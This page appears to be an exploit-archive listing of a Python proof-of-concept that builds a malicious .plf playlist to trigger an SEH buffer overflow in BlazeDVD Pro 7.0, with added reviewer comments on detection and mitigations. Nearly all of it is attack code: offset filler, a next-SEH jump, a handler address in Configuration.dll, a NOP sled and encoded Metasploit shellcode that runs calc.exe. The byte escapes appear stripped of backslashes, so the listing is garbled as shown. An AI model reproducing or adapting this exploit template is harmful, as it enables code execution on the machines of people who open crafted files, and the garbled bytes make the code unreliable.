
BlazeDVD Pro 7.0 Buffer Overflow

Posted on 20 August 2014

# BlazeDVD Pro v7.0 - (.plf) Buffer Overflow SEH
# Date: 19.08.2014
# Exploit Author: metacom
# Vendor Homepage: http://www.blazevideo.com/
# Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
# Version: 7.0.0.0
# Tested on: Win 7 EN, Win 8.1
#!/usr/bin/python
#
# Reviewer summary: Python 2 proof-of-concept (note the print statement at the
# end) that concatenates five byte strings and writes them to "BlazeDVD.plf"
# in the current working directory. According to the header, opening such a
# playlist in BlazeDVD Pro 7.0.0.0 overflows a buffer and overwrites a
# structured-exception-handler (SEH) record. The payload, per the generator
# comment below, is windows/exec CMD=calc.exe, i.e. a harmless demonstration.
#
# NOTE(review): every string literal below is kept exactly as this page shows
# it, and the original line breaks were reconstructed from the flattened
# listing.
#
# Defensive reading:
#   * The file is a single unbroken entry with no line terminator. A .plf
#     playlist carrying one very long, non-path-like line is a reasonable
#     thing to flag in mail or download scanning (assumption: legitimate
#     .plf files hold short media paths; confirm against real samples).
#   * The handler address is a fixed constant in a DLL the author names, so
#     the technique presumably relies on that module loading at a predictable
#     address without SafeSEH. SEHOP and ASLR are the platform mitigations
#     aimed at this class of SEH overwrite. The page mentions no vendor fix;
#     treat .plf files from untrusted sources as untrusted input.

from struct import pack

# 608 filler bytes placed before the SEH record fields; presumably the
# distance from the start of the vulnerable buffer to that record. The
# listing does not show how the figure was derived.
buffer= "x41" * 608
# Value written into the "next SEH" slot of the overwritten record.
nseh="xebx06xffxff"
# Value written into the handler slot: 0x6030F817 packed as a little-endian
# 32-bit integer. The author's trailing comment places it in Configuration.dll.
seh=pack("<I", 0x6030F817) #6030F817 5E POP ESI Configuration.dll
# 50 bytes of padding between the SEH record and the payload.
nops="x90" * 50
# Payload provenance as recorded by the author (Metasploit msfpayload piped
# into msfencode with the alpha_mixed encoder and a bad-character list):
# msfpayload windows/exec CMD=calc.exe R |
# msfencode -e x86/alpha_mixed -c 1 -b 'x00x0ax0dxff'
shell=("xdbxcdxd9x74x24xf4x5fx57x59x49x49x49x49x49"
"x49x49x49x49x43x43x43x43x43x43x43x37x51x5a"
"x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41"
"x42x32x42x42x30x42x42x41x42x58x50x38x41x42"
"x75x4ax49x69x6cx6bx58x4fx79x55x50x75x50x35"
"x50x33x50x4bx39x49x75x66x51x4ax72x52x44x6e"
"x6bx70x52x44x70x6ex6bx42x72x44x4cx4cx4bx63"
"x62x64x54x6ex6bx42x52x54x68x34x4fx6cx77x63"
"x7ax35x76x65x61x4bx4fx74x71x4fx30x6cx6cx65"
"x6cx71x71x53x4cx46x62x76x4cx37x50x49x51x68"
"x4fx76x6dx57x71x6bx77x7ax42x7ax50x32x72x42"
"x77x4cx4bx42x72x44x50x6cx4bx31x52x37x4cx55"
"x51x7ax70x4cx4bx33x70x62x58x4fx75x6bx70x51"
"x64x52x6ax77x71x78x50x42x70x4cx4bx52x68x47"
"x68x4cx4bx46x38x37x50x77x71x5ax73x58x63x55"
"x6cx53x79x4ex6bx66x54x4cx4bx73x31x38x56x75"
"x61x59x6fx36x51x59x50x4cx6cx6ax61x4ax6fx34"
"x4dx46x61x79x57x77x48x49x70x31x65x4bx44x65"
"x53x43x4dx6bx48x65x6bx53x4dx64x64x53x45x6d"
"x32x73x68x6ex6bx70x58x67x54x67x71x39x43x62"
"x46x6cx4bx76x6cx42x6bx4ex6bx62x78x45x4cx37"
"x71x38x53x4cx4bx46x64x4cx4bx45x51x48x50x4c"
"x49x50x44x71x34x47x54x71x4bx31x4bx63x51x31"
"x49x63x6ax70x51x69x6fx39x70x46x38x73x6fx53"
"x6ax4ex6bx56x72x58x6bx4bx36x31x4dx42x4ax55"
"x51x4cx4dx4dx55x38x39x65x50x65x50x65x50x56"
"x30x62x48x75x61x4cx4bx62x4fx4fx77x79x6fx49"
"x45x6fx4bx5ax50x6cx75x4dx72x36x36x42x48x59"
"x36x4ax35x4dx6dx6dx4dx49x6fx49x45x45x6cx45"
"x56x43x4cx76x6ax4fx70x39x6bx4bx50x42x55x36"
"x65x4dx6bx51x57x44x53x62x52x50x6fx62x4ax77"
"x70x56x33x6bx4fx4ax75x35x33x35x31x72x4cx33"
"x53x74x6ex32x45x43x48x75x35x37x70x41x41")
# Final file contents, in order: filler, next-SEH value, handler value,
# padding, payload.
poc = buffer + nseh + seh + nops + shell
try:
    # Writes the assembled string to BlazeDVD.plf (relative path, so the
    # file lands in whatever directory the script is run from).
    out_file = open("BlazeDVD.plf",'w')
    out_file.write(poc)
    out_file.close()
    print("[*] Malicious plf file created successfully")
except:
    # Bare except: any failure is reported with the same generic message
    # and the underlying cause is discarded.
    print "[!] Error creating file"

 
